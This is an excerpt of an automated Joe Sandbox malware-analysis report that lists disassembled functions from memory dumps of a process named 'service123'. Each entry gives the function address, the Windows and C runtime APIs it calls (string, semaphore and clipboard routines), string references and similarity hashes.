Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 6dc1205cba81a5ce1e1b8553db02d6486af196fe63c7376db873281d90c63567
Instruction ID: ad753d397d3d05e1eb9b5c5521c3ff756f038499e223c6e31f1f0f292a08c4b6
Opcode Fuzzy Hash: 6dc1205cba81a5ce1e1b8553db02d6486af196fe63c7376db873281d90c63567
Instruction Fuzzy Hash: B141B0F1A056148FCB00FF2CD88144ABBE4BF64214F46497DE8848BB14E331D999CBD2

Function 6C96E331 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C96E35D
strlen.MSVCRT ref: 6C96E3AD

Strings

basic_string: construction from null is not valid, xrefs: 6C96E37F, 6C96E3CF, 6C96E41F

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 2448498a389c721e1d29fac15eba91d60fc3ade40ba5b2e5e497acbf9f23106f
Instruction ID: bf20094799209f8caccb9d33ebbf5dee7873a65ff38c69696441202c9ef2a55f
Opcode Fuzzy Hash: 2448498a389c721e1d29fac15eba91d60fc3ade40ba5b2e5e497acbf9f23106f
Instruction Fuzzy Hash: 0F3166B16057248FCB00FF3CC88589AB7E4BF15618B1A486DE8C49B711D735E899CB92

Function 6C959660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C9596B2
MultiByteToWideChar.KERNEL32 ref: 6C9596F5

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: a56bd634d007aa781dcce843cd880424228250c2f3c5cd48750361d3777ed0c0
Instruction ID: 235a9051a041a0c99188cdf3941c2fec8de3f920488cc93234cd138dfc3de3bb
Opcode Fuzzy Hash: a56bd634d007aa781dcce843cd880424228250c2f3c5cd48750361d3777ed0c0
Instruction Fuzzy Hash: 183139B05093418FE700CF29D18434ABBF4BF86718F51891EE8D487350D376D85ACB42

Function 00667C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00667C92
MultiByteToWideChar.KERNEL32 ref: 00667CD5

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 261b6e31c215dca207eba0b8e6a4c4120f5bb26c79aa0b9b96600ac5d3893dd7
Instruction ID: c080f8e05de7fdf7fcdfdf67a563a94ec0b28e053ec7e4e8659729b2022e3131
Opcode Fuzzy Hash: 261b6e31c215dca207eba0b8e6a4c4120f5bb26c79aa0b9b96600ac5d3893dd7
Instruction Fuzzy Hash: DF31F2B050D3418FD710DF29D58466ABBF1BF86318F048D2EE9948B350E7B6D849CB92

Function 6C94F511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C94F5C1

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: d283ce91312dfb858dda3ca8beee95182fccde818d057e23a0fa9688877a3588
Instruction ID: 816e5db64eb8640d698e93252ee48b18ef0c0921d24ef9cdc985896e08a04e1c
Opcode Fuzzy Hash: d283ce91312dfb858dda3ca8beee95182fccde818d057e23a0fa9688877a3588
Instruction Fuzzy Hash: 524117B0A0A3028FDB19DF2AD5843267BF5FB46318F16C658D8988B695D331D446CBA2

Function 6C94F6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C94F751

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 277bdf5b4561f35136b0b15c9d5a231f88ed21b95187e2e1e237063c26daa87c
Instruction ID: 72f38d661362952c26f4bfb810362ac9b7e67d3f79c757181b81dcd7b3506615
Opcode Fuzzy Hash: 277bdf5b4561f35136b0b15c9d5a231f88ed21b95187e2e1e237063c26daa87c
Instruction Fuzzy Hash: AA3146B0A0A3028FDB099F2AD5843167BF4FB4671CF16C259D8948B695D336D406CBA2

Function 6C94F9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C94FA72
CreateSemaphoreW.KERNEL32 ref: 6C94FAB7
WaitForSingleObject.KERNEL32 ref: 6C94FB00

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 447a8736eac083e229ffa3a9380713aadff7a87ba7ceff317484ffbc33307042
Instruction ID: 1b59b5d510c62abbfe6b7491e72b30a37077b62761fef88e009b90fdd05ff058
Opcode Fuzzy Hash: 447a8736eac083e229ffa3a9380713aadff7a87ba7ceff317484ffbc33307042
Instruction Fuzzy Hash: 0B311570A093038FDB19DF2AC5843167BF4FB46318F16C659E8998B685D331D906CBA2

Function 6C94FB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C94FBF2
CreateSemaphoreW.KERNEL32 ref: 6C94FC37
WaitForSingleObject.KERNEL32 ref: 6C94FC80

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 6ee08f3d01b0813747cd8a8d2708cd7a47f6b8b826bf40c4df5b2d815f8da39d
Instruction ID: 74065f469539cba50948645e94de52705ac8d641dfd19718fc7276b4bfffe575
Opcode Fuzzy Hash: 6ee08f3d01b0813747cd8a8d2708cd7a47f6b8b826bf40c4df5b2d815f8da39d
Instruction Fuzzy Hash: 54310AB0A093038FDB09DF2AC5843167BF5FB46759F11C25CE8988B685D335D446CBA2

Function 6C9455A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9472FE

Strings

{parm#, xrefs: 6C9472D9
this, xrefs: 6C9455B3
}, xrefs: 6C947392

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: b28537eb9e7feaad6ed76d42dc4d6beb4a88f2fa3667a12c71fdcd73dc1fa4ca
Instruction ID: e5311c28b75a8367062dc84a532f620a60f1bab4d05b99d783004b64a0f863ef
Opcode Fuzzy Hash: b28537eb9e7feaad6ed76d42dc4d6beb4a88f2fa3667a12c71fdcd73dc1fa4ca
Instruction Fuzzy Hash: DE216D7150D252CFD7018F18D0843A9BBA1AFA2318F19C5BEDCC84FA0AD779D485CBA2

Function 00661001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0066106B
__p__fmode.MSVCRT ref: 00661070
__p__commode.MSVCRT ref: 0066107D

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 2594694b0dbbfac9f5816a199e1951cca6552772aedcb57dc2ece1429934230b
Instruction ID: a5727551761ffcd82429ad9f04a7c7c117635f1ddf7a2827d68efeec205b3962
Opcode Fuzzy Hash: 2594694b0dbbfac9f5816a199e1951cca6552772aedcb57dc2ece1429934230b
Instruction Fuzzy Hash: 7521B470A08281CBCB14AF20C9057A637E3BB06308F98856CC4198F356DBBAD8C6DB95

Function 6C959BD7 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C959BE7
GlobalLock.KERNEL32 ref: 6C959BF9
GlobalUnlock.KERNEL32 ref: 6C959C1A
CloseClipboard.USER32 ref: 6C959C23
CloseClipboard.USER32 ref: 6C959C48
GetClipboardSequenceNumber.USER32 ref: 6C959C6E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockNumberSequenceUnlock
String ID:
API String ID: 1345600146-0
Opcode ID: 2f6567e60f738739ded04a30fe950dcae586c4aee38f4eb37c27232437ffe7b0
Instruction ID: f8019c7c93c928b428514f0238a10ff921e20ecb4036c851cd546ce265d0cc59
Opcode Fuzzy Hash: 2f6567e60f738739ded04a30fe950dcae586c4aee38f4eb37c27232437ffe7b0
Instruction Fuzzy Hash: 82F06DB26086028FEB05BF79E54816EBBF1AF65215F46463CD88697240DB34D41A8B93

Function 6C9B9D20 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C9B9D35
strlen.MSVCRT ref: 6C9B9D3F
memcpy.MSVCRT ref: 6C9B9D68
setlocale.MSVCRT ref: 6C9B9D7C

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 85f9d29ab0fff0c30534c23cbc71792f652a19b886763e0673aa628621ed92aa
Instruction ID: 6a39a461e5bd7c4bc92452fe509abf481d4c869cd841cf5e3f554af07d66f524
Opcode Fuzzy Hash: 85f9d29ab0fff0c30534c23cbc71792f652a19b886763e0673aa628621ed92aa
Instruction Fuzzy Hash: 2DF03AB15093109AE700BF6894453AFFAE4EFA0644F468C1DE4C88B710D778C4498B92

Function 6C954C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

@, xrefs: 6C954D17
u, xrefs: 6C954C66

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: fec052c658f58146f88808735fd1b98e86d7cd3f9f382a9849f0633cc4ab935b
Instruction ID: 69d46ccb89e5098247c0ddd434b17948d82be9229c52856390ef172e2d91c8fb
Opcode Fuzzy Hash: fec052c658f58146f88808735fd1b98e86d7cd3f9f382a9849f0633cc4ab935b
Instruction Fuzzy Hash: 36A18B7160C3958BD760CF25D08039ABBE5BB85308F558A1DE8DC8B742D735D969CF82

Function 00664558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 00664596
@, xrefs: 00664647

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: ff7ed57f299504cecd3b5377317ae3675c00309e82f7e0bb21f80826285bb761
Instruction ID: f64ddc6ffbdde610e48299c39abb50bcee29265d049fb1a7846cacf4e05aecae
Opcode Fuzzy Hash: ff7ed57f299504cecd3b5377317ae3675c00309e82f7e0bb21f80826285bb761
Instruction Fuzzy Hash: C2A16F7150C3918BC731CF24C0903AABBE2BF85718F148A1EE8D997355DB35D94ADB82

Function 6C9552F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C95548E

Part of subcall function 6C952F00: fputc.MSVCRT ref: 6C952FC8

Strings

@, xrefs: 6C954D17
(null), xrefs: 6C9552F7

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 89e09c01d034768b8c364877392c240bb6a1c725e336414d06cd2e2a24c9f339
Instruction ID: 0fe341e65f772dbaed6ca155b532a40e60930db138de3b42a41cbbef0364f160
Opcode Fuzzy Hash: 89e09c01d034768b8c364877392c240bb6a1c725e336414d06cd2e2a24c9f339
Instruction Fuzzy Hash: 6391BC7160C3958BD761CF25D08039ABBE5BF85308F958A1DE8DC8B742D735D92ACB82

Function 00664C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00664DBE

Part of subcall function 00662830: fputc.MSVCRT ref: 006628F8

Strings

(null), xrefs: 00664C27
@, xrefs: 00664647

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: b90dd5aef4bea5e05009fe4a371472b431052b377b2df7904abab5cf4eaaec27
Instruction ID: f8898946c72f8c65d6e704804af07ca5c81760ab55f62f8997bf5faf8547b2c1
Opcode Fuzzy Hash: b90dd5aef4bea5e05009fe4a371472b431052b377b2df7904abab5cf4eaaec27
Instruction Fuzzy Hash: 9091807560C3918BD7318F24C0903AABBE2BF85714F148A1EE8D997342EB35D946DB82

Function 6C9D5B60 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9D5B9A
wcslen.MSVCRT ref: 6C9D5C2C
wcslen.MSVCRT ref: 6C9D5CBE
strlen.MSVCRT ref: 6C9D5D50

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: f5d6445316af8535084de6aea5c40f01fae8c930549d014319e5f8d6b99f1911
Instruction ID: 5cbc77edd0b5ea7ff93b7592b1c02686905e7d6e75e6825185c794b139b40257
Opcode Fuzzy Hash: f5d6445316af8535084de6aea5c40f01fae8c930549d014319e5f8d6b99f1911
Instruction Fuzzy Hash: 62F14BB4A05A058FC700DF6DC1849AEFBF4FF44314B128A69E895DBB54DB34E945CB81

Function 6C9D5380 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9D53BA
wcslen.MSVCRT ref: 6C9D544C
wcslen.MSVCRT ref: 6C9D54DE
strlen.MSVCRT ref: 6C9D5570

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 69a62c776a2f9428a691c52362e4cfaedb6184f81511c9b298586fe53af69d13
Instruction ID: a4284b6b953ca547de41656d4227e0a7496d84199fc21db42ba505042eeca9ca
Opcode Fuzzy Hash: 69a62c776a2f9428a691c52362e4cfaedb6184f81511c9b298586fe53af69d13
Instruction Fuzzy Hash: 80F149B4A05A058FC700DFADC1849AEBBF1FF44314B128A69E895DBB54DB34E946CF81

Function 6C953080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C953101

Strings

NaN, xrefs: 6C953081

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: f1a88eaf60bb598b43ff7f6d51ea5a179473d218a8453a73b23f3aa0e316b070
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 194135B1A05615CBDB10CF39C480786B7E5BF89708BA9C2A9DC488F74AD336DD568B90

Function 006629B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00662A31

Strings

NaN, xrefs: 006629B1

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
